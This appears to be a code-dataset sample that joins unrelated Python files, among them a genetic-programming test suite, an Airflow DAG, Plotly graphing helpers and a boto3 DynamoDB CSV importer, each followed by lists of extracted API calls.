import pandas as pd
# 替换异常值
if __name__ == '__main__':
df = pd.read_csv("../dataset/temp4.csv")
df.replace(to_replace='-', value=0.5, inplace=True)
print(df.head(3))
df.to_csv("../dataset/temp5.csv", index=False)
| [
"pandas.read_csv"
] | [((78, 113), 'pandas.read_csv', 'pd.read_csv', (['"""../dataset/temp4.csv"""'], {}), "('../dataset/temp4.csv')\n", (89, 113), True, 'import pandas as pd\n')] |
import unittest
import datetime
import genetic
import random
class Node:
Value = None
Left = None
Right = None
def __init__(self, value, left=None, right=None):
self.Value = value
self.Left = left
self.Right = right
def isFunction(self):
return self.Left is not None
def __str__(self):
result = self.Value
if self.isFunction():
result += "([" + str(self.Left) + "]"
if self.Right is not None:
result += ",[" + str(self.Right) + "]"
result += ")"
return result + " "
class Operation:
Func = None
HasLeft = None
HasRight = None
def __init__(self, func, hasLeft, hasRight):
self.Func = func
self.HasLeft = hasLeft
self.HasRight = hasRight
def getUsedIndexes(candidate):
used = {0: [0]}
if candidate[0].isFunction():
for i in reversed(range(len(candidate))):
element = candidate[i]
iUsed = [i]
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
if i < leftIndex < len(candidate):
iUsed.extend(used[leftIndex])
if rightIndex is not None:
if i < rightIndex < len(candidate):
iUsed.extend(used[rightIndex])
used[i] = iUsed
return set(used[0])
def getFitness(candidate, geneset, rules):
usedIndexes = getUsedIndexes(candidate)
localCopy = candidate[:]
notUsed = list(set(range(len(candidate))) - usedIndexes)
for i in notUsed:
localCopy[i] = None
fitness = 0
for rule in rules:
if getFitnessForRule(localCopy, rule[0], rule[1], geneset) == rule[2]:
fitness += 1
if fitness == len(rules):
fitness = 1000 - len(usedIndexes)
return fitness
def getFitnessForRule(candidate, a, b, geneset):
if candidate[0].isFunction():
localCopy = candidate[:]
for i in reversed(range(len(localCopy))):
element = localCopy[i]
if element is None:
continue
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
left = None
if i < leftIndex < len(localCopy):
left = localCopy[leftIndex].Value
right = None
if rightIndex is not None:
if i < rightIndex < len(localCopy):
right = localCopy[rightIndex].Value
value = element.Value
if isinstance(element.Value, str):
gene = geneset[element.Value]
value = gene.Func(left if left is not None else 0,
right if right is not None else 0)
localCopy[i] = Node(value)
else:
localCopy[i] = Node(geneset[element.Value].Func(a, b))
result = localCopy[0].Value
else:
result = geneset[candidate[0].Value].Func(a, b)
return result
def displayDot(candidate, startTime):
result = createDot(candidate.Genes)
timeDiff = datetime.datetime.now() - startTime
print("%s\nfitness: %i\t%s\t%s" % (";".join(result), candidate.Fitness, str(timeDiff), candidate.Strategy))
def createDot(genes):
dotCommands = []
added = [False for i in range(0, len(genes))]
stack = [0]
haveZeroNode = False
while len(stack) > 0:
index = stack.pop()
if added[index]:
continue
added[index] = True
element = genes[index]
if not element.isFunction():
dotCommands.append(str(index) + " [label=\"" + str(element.Value) + "\"]")
else:
dotCommands.append(str(index) + " [label=\"" + element.Value + "\"]")
leftIndex = element.Left
if index < leftIndex < len(genes):
stack.append(leftIndex)
dotCommands.append(str(leftIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
rightIndex = element.Right
if rightIndex is not None:
if index < rightIndex < len(genes):
stack.append(rightIndex)
dotCommands.append(str(rightIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
return dotCommands
def displayRaw(candidate, startTime):
timeDiff = datetime.datetime.now() - startTime
print("%s\t%i\t%s" %
((' '.join(map(str, [str(item) for item in candidate.Genes]))),
candidate.Fitness,
str(timeDiff)))
def mutate(childGenes, fnCreateGene):
childIndexesUsed = list(getUsedIndexes(childGenes))
index = childIndexesUsed[random.randint(0, len(childIndexesUsed) - 1)]
childGenes[index] = fnCreateGene(index, len(childGenes))
def crossover(child, parent):
usedParentIndexes = list(sorted(getUsedIndexes(parent)))
usedChildIndexes = list(getUsedIndexes(child))
if len(usedParentIndexes) == 1 and len(usedChildIndexes) == 1:
# node 0 has no child nodes, just copy it
child[0] = parent[0]
return
while True:
parentIndex = usedParentIndexes[random.randint(0, len(usedParentIndexes) - 1)]
childIndex = usedChildIndexes[random.randint(0, len(usedChildIndexes) - 1)]
if parentIndex != 0 or childIndex != 0:
# don't copy the root to the root
break
unusedChildIndexes = list(sorted(set(range(childIndex, len(child))) - set(usedChildIndexes)))
unusedChildIndexes.insert(0, childIndex)
mappedIndexes = {}
nextIndex = 0
for pIndex in usedParentIndexes:
if pIndex < parentIndex:
continue
if len(unusedChildIndexes) > nextIndex:
mappedIndexes[pIndex] = unusedChildIndexes[nextIndex]
else:
mappedIndexes[pIndex] = len(child) + nextIndex - len(unusedChildIndexes)
nextIndex += 1
for parentIndex in mappedIndexes.keys():
node = parent[parentIndex]
childIndex = mappedIndexes[parentIndex]
childNode = Node(node.Value, node.Left, node.Right)
if childIndex < len(child):
child[childIndex] = childNode
else:
child.append(childNode)
left = node.Left
if left is not None:
childNode.Left = mappedIndexes[left] if left in mappedIndexes else 0
right = node.Right
if right is not None:
childNode.Right = mappedIndexes[right] if right in mappedIndexes else 0
def createGene(index, length, geneset):
keys = list(geneset.keys())
key = keys[random.randint(0, len(keys) - 1)]
op = geneset[key]
left = random.randint(index, length - 1) if op.HasLeft else None
right = random.randint(index, length - 1) if op.HasRight else None
return Node(key, left, right)
class OperationGenerationTests(unittest.TestCase):
geneset = None
@classmethod
def setUpClass(cls):
cls.geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False)}
def test_generate_OR(self):
minNodes = 6 # not( and( not(a), not(b)))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 1]]
maxNodes = 20
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR(self):
minNodes = 9 # and( not( and(a, b)), not( and( not(a), not(b))))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR_with_addition(self):
minNodes = 5 # and( 1, +(a, b))
geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False),
'+': Operation(lambda a, b: a + b, True, True),
'1': Operation(lambda a, b: 1, False, False)}
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_getFitness_given_base_node_is_A_and_1_matching_rule_should_return_1(self):
rules = [[0, 0, 0], [0, 1, 1]]
genes = [Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_B_and_1st_2_rules_match_should_return_2(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1]]
genes = [Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 2)
def test_getFitness_given_base_node_is_NOT_with_Left_node_out_of_bounds_and_1st_rule_matches_should_return_1(self):
rules = [[1, 1, 1], [0, 0, 0]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_NOT_with_Left_node_A_and_2nd_rule_matches_should_return_1(self):
rules = [[0, 0, 0], [1, 1, 1]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_AND_with_both_nodes_out_of_bounds_and_0_matching_rules_should_return_0(self):
rules = [[1, 0, 1]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 0)
def test_getFitness_given_all_rules_pass_and_1_gene_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - len(genes))
def test_getFitness_given_all_rules_pass_and_2_genes_but_only_1_used_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 1)
def test_getFitness_given_all_rules_pass_and_3_genes_but_only_2_used_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 2, 100), Node('AND', 2, 2), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_all_rules_pass_with_NOT_2_NOT_1_NOT_2_B_A_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('NOT', 2), Node('NOT', 1), Node('NOT', 2), Node('B'), Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_rules_and_genes_for_XOR_should_get_1000_minus_9(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
# and( not( and(a, b)), not( and( not(a), not(b))))
genes = [Node('AND', 1, 2), Node('NOT', 3), Node('NOT', 4), Node('AND', 5, 6), Node('AND', 7, 8),
Node('NOT', 7), Node('NOT', 8), Node('A'), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 9)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"datetime.datetime.now",
"genetic.getBest",
"random.randint"
] | [((13637, 13652), 'unittest.main', 'unittest.main', ([], {}), '()\n', (13650, 13652), False, 'import unittest\n'), ((3240, 3263), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3261, 3263), False, 'import datetime\n'), ((4884, 4907), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4905, 4907), False, 'import datetime\n'), ((7176, 7209), 'random.randint', 'random.randint', (['index', '(length - 1)'], {}), '(index, length - 1)\n', (7190, 7209), False, 'import random\n'), ((7246, 7279), 'random.randint', 'random.randint', (['index', '(length - 1)'], {}), '(index, length - 1)\n', (7260, 7279), False, 'import random\n'), ((7966, 7989), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7987, 7989), False, 'import datetime\n'), ((8306, 8472), 'genetic.getBest', 'genetic.getBest', (['fnGetFitness', 'fnDisplay', 'minNodes', 'optimalValue'], {'createGene': 'fnCreateGene', 'maxLen': 'maxNodes', 'customMutate': 'fnMutate', 'customCrossover': 'crossover'}), '(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene\n =fnCreateGene, maxLen=maxNodes, customMutate=fnMutate, customCrossover=\n crossover)\n', (8321, 8472), False, 'import genetic\n'), ((8798, 8821), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8819, 8821), False, 'import datetime\n'), ((9138, 9304), 'genetic.getBest', 'genetic.getBest', (['fnGetFitness', 'fnDisplay', 'minNodes', 'optimalValue'], {'createGene': 'fnCreateGene', 'maxLen': 'maxNodes', 'customMutate': 'fnMutate', 'customCrossover': 'crossover'}), '(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene\n =fnCreateGene, maxLen=maxNodes, customMutate=fnMutate, customCrossover=\n crossover)\n', (9153, 9304), False, 'import genetic\n'), ((10013, 10036), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (10034, 10036), False, 'import datetime\n'), ((10343, 10509), 'genetic.getBest', 'genetic.getBest', (['fnGetFitness', 'fnDisplay', 'minNodes', 'optimalValue'], {'createGene': 'fnCreateGene', 'maxLen': 'maxNodes', 'customMutate': 'fnMutate', 'customCrossover': 'crossover'}), '(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene\n =fnCreateGene, maxLen=maxNodes, customMutate=fnMutate, customCrossover=\n crossover)\n', (10358, 10509), False, 'import genetic\n')] |
from graphene import Schema, Mutation, String, Field, ID, List
from minio import Minio
from minio.error import ResponseError
from .minio_bucket import MinioBucket
from minio_client.client import minio_client
class CreateMinioBucket(Mutation):
# Use minio bucket type definition to be returned when created
Output = MinioBucket
# Subclass for describing what arguments mutation takes
class Arguments:
bucket_name = String()
# Resolver function with arguments
def mutate(root, info, bucket_name):
try:
minio_client.make_bucket(bucket_name)
return {'bucket_name': bucket_name}
except ResponseError as err:
print(err) | [
"graphene.String",
"minio_client.client.minio_client.make_bucket"
] | [((429, 437), 'graphene.String', 'String', ([], {}), '()\n', (435, 437), False, 'from graphene import Schema, Mutation, String, Field, ID, List\n'), ((529, 566), 'minio_client.client.minio_client.make_bucket', 'minio_client.make_bucket', (['bucket_name'], {}), '(bucket_name)\n', (553, 566), False, 'from minio_client.client import minio_client\n')] |
import mock
import pytest
from openapi_core.schema.links.models import Link
from openapi_core.schema.servers.models import Server
class TestLinks(object):
@pytest.fixture
def link_factory(self):
def link_factory(request_body, server):
parameters = {
'par1': mock.sentinel.par1,
'par2': mock.sentinel.par2,
}
return Link(
'op_id',
parameters,
request_body,
'Test link',
server
)
return link_factory
servers = [
None,
Server("https://bad.remote.domain.net/"),
Server("http://localhost")
]
request_body_list = [
None,
"request",
'{"request": "value", "opt": 2}',
{"request": "value", "opt": 2}
]
@pytest.mark.parametrize("server", servers)
@pytest.mark.parametrize("request_body", request_body_list)
def test_iteritems(self, link_factory, request_body, server):
link = link_factory(request_body, server)
for par_name in link.parameters:
assert link[par_name] == link.parameters[par_name]
| [
"pytest.mark.parametrize",
"openapi_core.schema.servers.models.Server",
"openapi_core.schema.links.models.Link"
] | [((861, 903), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""server"""', 'servers'], {}), "('server', servers)\n", (884, 903), False, 'import pytest\n'), ((909, 967), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""request_body"""', 'request_body_list'], {}), "('request_body', request_body_list)\n", (932, 967), False, 'import pytest\n'), ((625, 665), 'openapi_core.schema.servers.models.Server', 'Server', (['"""https://bad.remote.domain.net/"""'], {}), "('https://bad.remote.domain.net/')\n", (631, 665), False, 'from openapi_core.schema.servers.models import Server\n'), ((675, 701), 'openapi_core.schema.servers.models.Server', 'Server', (['"""http://localhost"""'], {}), "('http://localhost')\n", (681, 701), False, 'from openapi_core.schema.servers.models import Server\n'), ((403, 463), 'openapi_core.schema.links.models.Link', 'Link', (['"""op_id"""', 'parameters', 'request_body', '"""Test link"""', 'server'], {}), "('op_id', parameters, request_body, 'Test link', server)\n", (407, 463), False, 'from openapi_core.schema.links.models import Link\n')] |
import sys
from collections import deque
n = int(sys.stdin.readline())
deck = deque(list(range(1, n+1)))
for i in range(n-1):
deck.popleft()
deck.append(deck.popleft())
print(str(deck.pop()))
| [
"sys.stdin.readline"
] | [((50, 70), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (68, 70), False, 'import sys\n')] |
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from django.urls import URLPattern
DEBUG: bool = True
DEFAULT_FROM_EMAIL: str = '<EMAIL>'
SECRET_KEY: str = 'not so secret'
MY_SETTING: URLPattern = URLPattern(pattern='foo', callback=lambda: None)
| [
"django.urls.URLPattern"
] | [((284, 333), 'django.urls.URLPattern', 'URLPattern', ([], {'pattern': '"""foo"""', 'callback': '(lambda : None)'}), "(pattern='foo', callback=lambda : None)\n", (294, 333), False, 'from django.urls import URLPattern\n')] |
import json
from datetime import timedelta, datetime
from requests import get
from airflow import DAG
from airflow.models import Variable
from airflow.operators.python_operator import PythonOperator
# Config variables
# dag_config = Variable.get("hello_world_variables", deserialize_json=True)
default_args = {
'owner': 'nalin',
'depends_on_past': True,
'start_date': datetime(2020, 12, 4),
# 'end_date': datetime(2018, 12, 5),
'email': ['<EMAIL>'],
'email_on_failure': True,
'email_on_retry': True,
'retries': 2,
'retry_delay': timedelta(minutes=2),
}
# Set Schedule: Run pipeline once a day.
# Use cron to define exact time. Eg. 8:15am would be "15 08 * * *"
schedule_interval = "21 1 * * *"
# Define DAG: Set ID and assign default args and schedule interval
dag = DAG(
'fake_rest_api',
default_args=default_args,
schedule_interval=schedule_interval
)
def hello_world():
print("Hello World")
def fetch_data():
url = "https://jsonplaceholder.typicode.com/todos"
response = get(url)
if response.status_code == 200:
print(response.text)
else:
print(response.status_code)
def bye_world():
print("Bye World")
t1 = PythonOperator(
task_id='print_hello_world',
provide_context=False,
python_callable=hello_world,
dag=dag,
)
t2 = PythonOperator(
task_id='fetch_data',
provide_context=False,
python_callable=fetch_data,
dag=dag,
)
t3 = PythonOperator(
task_id='print_bye_world',
provide_context=False,
python_callable=bye_world,
dag=dag,
)
t1 >> [t2]
t2 >> [t3] | [
"datetime.datetime",
"airflow.operators.python_operator.PythonOperator",
"requests.get",
"airflow.DAG",
"datetime.timedelta"
] | [((813, 902), 'airflow.DAG', 'DAG', (['"""fake_rest_api"""'], {'default_args': 'default_args', 'schedule_interval': 'schedule_interval'}), "('fake_rest_api', default_args=default_args, schedule_interval=\n schedule_interval)\n", (816, 902), False, 'from airflow import DAG\n'), ((1219, 1327), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""print_hello_world"""', 'provide_context': '(False)', 'python_callable': 'hello_world', 'dag': 'dag'}), "(task_id='print_hello_world', provide_context=False,\n python_callable=hello_world, dag=dag)\n", (1233, 1327), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1349, 1450), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""fetch_data"""', 'provide_context': '(False)', 'python_callable': 'fetch_data', 'dag': 'dag'}), "(task_id='fetch_data', provide_context=False, python_callable\n =fetch_data, dag=dag)\n", (1363, 1450), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1471, 1575), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""print_bye_world"""', 'provide_context': '(False)', 'python_callable': 'bye_world', 'dag': 'dag'}), "(task_id='print_bye_world', provide_context=False,\n python_callable=bye_world, dag=dag)\n", (1485, 1575), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((387, 408), 'datetime.datetime', 'datetime', (['(2020)', '(12)', '(4)'], {}), '(2020, 12, 4)\n', (395, 408), False, 'from datetime import timedelta, datetime\n'), ((572, 592), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(2)'}), '(minutes=2)\n', (581, 592), False, 'from datetime import timedelta, datetime\n'), ((1052, 1060), 'requests.get', 'get', (['url'], {}), '(url)\n', (1055, 1060), False, 'from requests import get\n')] |
from pathlib import Path
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
import plotly
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
# -------------------- Graphing Functions --------------------
def single_chromosome_graph_line(
df,
chromosome,
chosen_template,
marker_width,
colors,
font_size,
xaxis_gridlines,
yaxis_gridlines,
font_family,
samples,
):
""" Filter out current chromosome and set x- and y-max"""
curr_chrom_data = df[df["Chromosome"] == chromosome]
y_max = float(curr_chrom_data["Value"].max())
fig = px.line(
curr_chrom_data,
x='Window',
y='Value',
category_orders={"Sample": samples},
color='Sample',
color_discrete_sequence=colors,
height=500,
)
fig.update_layout(
font=dict(
size=font_size,
family=font_family,
),
legend=dict(
itemsizing='trace',
orientation="h",
xanchor="left",
x=0,
y=1.02,
yanchor="bottom",
),
showlegend=True,
template=chosen_template,
title_x=0.5,
)
fig.update_xaxes(
title="Position",
rangemode='tozero',
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
title="Value",
range=[0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
)
fig.update_traces(
line=dict(width=float(marker_width)),
)
return fig
def single_chromosome_graph_scatter(
df,
chromosome,
chosen_template,
marker_width,
colors,
font_size,
xaxis_gridlines,
yaxis_gridlines,
font_family,
samples,
):
""" Filter out current chromosome and set x- and y-max"""
curr_chrom_data = df[df["Chromosome"] == chromosome]
y_max = float(curr_chrom_data["Value"].max())
fig = px.scatter(
curr_chrom_data,
x='Window',
y='Value',
category_orders={"Sample": samples},
color='Sample',
color_discrete_sequence=colors,
height=500,
)
fig.update_layout(
font=dict(
size=font_size,
family=font_family,
),
legend=dict(
itemsizing='trace',
orientation="h",
xanchor="left",
x=0,
y=1.02,
yanchor="bottom",
),
showlegend=True,
template=chosen_template,
title_x=0.5,
)
fig.update_xaxes(
title="Position",
rangemode='tozero',
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
title="Value",
range=[0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
)
fig.update_traces(
marker=dict(size=float(marker_width)),
)
return fig
def whole_genome_line(
df,
chromosomes,
samples,
colors,
marker_width,
template,
font_size,
y_max,
x_max,
xaxis_gridlines,
yaxis_gridlines,
font_family,
):
fig = make_subplots(
rows=len(chromosomes),
cols=1,
x_title="Position",
y_title="Edit Me!",
row_titles=chromosomes,
row_heights=[2]*len(chromosomes),
)
for n, sample in enumerate(samples):
legend_flag = True
for row, current_chromosome in enumerate(chromosomes, start=1):
filt = (df['Chromosome'] == current_chromosome) & (df["Sample"] == sample)
sample_chromosome_data = df[filt]
# Make figure
fig.add_trace(
go.Scatter(
x=sample_chromosome_data['Window'],
y=sample_chromosome_data['Value'],
mode='lines',
legendgroup=str(sample),
name=sample,
line=dict(
color=colors[n],
width=float(marker_width)
),
showlegend=legend_flag,
),
row=row,
col=1
)
legend_flag = False
continue
# --- Update Figure ---
fig.update_layout(
font=dict(size=font_size, family=font_family),
height=125*len(chromosomes),
hovermode="x unified",
legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="left",
x=0,
itemsizing='trace',
title="",
),
margin=dict(
l=60,
r=50,
b=60,
t=10,
),
template=template,
title_x=0.5,
font_family="Arial",
)
fig.update_xaxes(
fixedrange=True,
range=[0, x_max],
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
range=[0.0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
)
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
# Rotate chromosome names to 0-degrees
for annotation in fig['layout']['annotations']:
if annotation['text'] == "Edit Me!":
continue
annotation['textangle']=0
annotation['align']="center"
return fig
def whole_genome_scatter(
df,
chromosomes,
samples,
colors,
marker_width,
template,
font_size,
y_max,
x_max,
xaxis_gridlines,
yaxis_gridlines,
font_family,
):
# fig = make_subplots(
# rows=len(chromosomes),
# cols=1,
# x_title="Position",
# y_title="Edit Me!",
# row_titles=chromosomes,
# row_heights=[2]*len(chromosomes),
# )
# for n, sample in enumerate(samples):
# legend_flag = True
# for row, current_chromosome in enumerate(chromosomes, start=1):
# filt = (df['Chromosome'] == current_chromosome) & (df["Sample"] == sample)
# sample_chromosome_data = df[filt]
# # Make figure
# fig.add_trace(
# go.Scatter(
# x=sample_chromosome_data['Window'],
# y=sample_chromosome_data['Value'],
# mode='markers',
# legendgroup=str(sample),
# name=sample,
# line=dict(
# color=colors[n],
# width=float(marker_width)
# ),
# showlegend=legend_flag,
# ),
# row=row,
# col=1
# )
# legend_flag = False
# continue
fig = px.scatter(
df,
x='Window',
y='Value',
category_orders={"Sample": samples},
color='Sample',
color_discrete_sequence=colors,
# height=500,
facet_row="Chromosome",
)
# --- Update Figure ---
fig.update_layout(
font=dict(size=font_size, family=font_family),
height=125*len(chromosomes),
hovermode="x unified",
legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="left",
x=0,
itemsizing='trace',
title="",
),
margin=dict(
l=60,
r=50,
b=60,
t=10,
),
template=template,
title_x=0.5,
font_family=font_family,
)
fig.update_xaxes(
fixedrange=True,
range=[0, x_max],
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
range=[0.0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
title='',
)
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig.update_traces(marker=dict(size=float(marker_width)))
# Rotate chromosome names to 0-degrees
for annotation in fig['layout']['annotations']:
if annotation['text'] == "Edit Me!":
continue
annotation['textangle']=0
annotation['align']="center"
return fig
# -------------------- File Validation --------------------
def validate_signal_tracer_headers(df):
"""Validate that headers are correct"""
expected_headers = ["Chromosome", "Window", "Sample", "Value"]
try:
assert list(df.columns) == expected_headers
return True
except AssertionError:
return False
def validate_signal_tracer_values(xlsx_df):
"""Return False if value column data are not int or float"""
try:
assert xlsx_df['Value'].dtype != "object"
return True
except AssertionError:
return False
def validate_file_type(filename):
"""Return False if file type is not valid """
valid_filetypes = ['.tsv', '.csv', '.xlsx', '.txt']
filetype = Path(filename).suffix
if filetype not in valid_filetypes:
return False
else:
return True
| [
"plotly.express.line",
"plotly.express.scatter",
"pathlib.Path"
] | [((698, 846), 'plotly.express.line', 'px.line', (['curr_chrom_data'], {'x': '"""Window"""', 'y': '"""Value"""', 'category_orders': "{'Sample': samples}", 'color': '"""Sample"""', 'color_discrete_sequence': 'colors', 'height': '(500)'}), "(curr_chrom_data, x='Window', y='Value', category_orders={'Sample':\n samples}, color='Sample', color_discrete_sequence=colors, height=500)\n", (705, 846), True, 'import plotly.express as px\n'), ((2017, 2173), 'plotly.express.scatter', 'px.scatter', (['curr_chrom_data'], {'x': '"""Window"""', 'y': '"""Value"""', 'category_orders': "{'Sample': samples}", 'color': '"""Sample"""', 'color_discrete_sequence': 'colors', 'height': '(500)'}), "(curr_chrom_data, x='Window', y='Value', category_orders={\n 'Sample': samples}, color='Sample', color_discrete_sequence=colors,\n height=500)\n", (2027, 2173), True, 'import plotly.express as px\n'), ((6785, 6935), 'plotly.express.scatter', 'px.scatter', (['df'], {'x': '"""Window"""', 'y': '"""Value"""', 'category_orders': "{'Sample': samples}", 'color': '"""Sample"""', 'color_discrete_sequence': 'colors', 'facet_row': '"""Chromosome"""'}), "(df, x='Window', y='Value', category_orders={'Sample': samples},\n color='Sample', color_discrete_sequence=colors, facet_row='Chromosome')\n", (6795, 6935), True, 'import plotly.express as px\n'), ((8960, 8974), 'pathlib.Path', 'Path', (['filename'], {}), '(filename)\n', (8964, 8974), False, 'from pathlib import Path\n')] |
import boto3
import csv
import json
import argparse
'''
You need to have aws configured with access tokens prior to running this script (use aws configure)
'''
def batch_create(table, csv_file_name, column_names):
'''
Can Handle many puts at one time. Boto3 gives an example of 50, even though
max batch size is 25, because batch writer is buffering and sending items behind the scenes.
'''
print('Beginning csv to dynamo import...')
with table.batch_writer() as batch:
with open(csv_file_name, newline='') as csv_file:
reader = csv.reader(csv_file)
# skip first row which we know is a header row
next(reader)
count = 0
for row in reader:
item = {}
for column in range (0, len(column_names)):
item[column_names[column]] = row[column]
batch.put_item(Item=item)
count += 1
if count % 100 == 0:
print('Inserted ' + str(count) + ' items...')
csv_file.close()
print('Finished importing data into dynamo...')
def validate(table, csv_file_name, partition_key_col_name, sort_key_col_name):
print('Beginning data validation...')
with open(csv_file_name, newline='') as csv_file:
reader = csv.reader(csv_file)
# skip first row which we know is a header row
next(reader)
for row in reader:
key = {partition_key_col_name: row[0], sort_key_col_name: row[1]}
try:
response = table.get_item(Key=key)
assert('Item' in response)
except AssertionError:
print('Failed to validate data. Key ' + json.dumps(key) + ' does not exist...')
csv_file.close()
print('Finished data validation...')
def main():
csv_file_name = ''
table_name = ''
region = 'us-west-2'
partition_key_col_name = ''
sort_key_col_name=''
column_names = [partition_key_col_name, sort_key_col_name, 'Column3']
dynamodb_resource = boto3.resource('dynamodb', region_name=region)
table = dynamodb_resource.Table(table_name)
batch_create(table, csv_file_name, column_names)
validate(table, csv_file_name, partition_key_col_name, sort_key_col_name)
if __name__ == "__main__":
main() | [
"boto3.resource",
"json.dumps",
"csv.reader"
] | [((2087, 2133), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'region_name': 'region'}), "('dynamodb', region_name=region)\n", (2101, 2133), False, 'import boto3\n'), ((1335, 1355), 'csv.reader', 'csv.reader', (['csv_file'], {}), '(csv_file)\n', (1345, 1355), False, 'import csv\n'), ((577, 597), 'csv.reader', 'csv.reader', (['csv_file'], {}), '(csv_file)\n', (587, 597), False, 'import csv\n'), ((1742, 1757), 'json.dumps', 'json.dumps', (['key'], {}), '(key)\n', (1752, 1757), False, 'import json\n')] |
import numpy as np
import scipy as sp
import ast
import os
from quchem.Unitary_Partitioning.Graph import Clique_cover_Hamiltonian
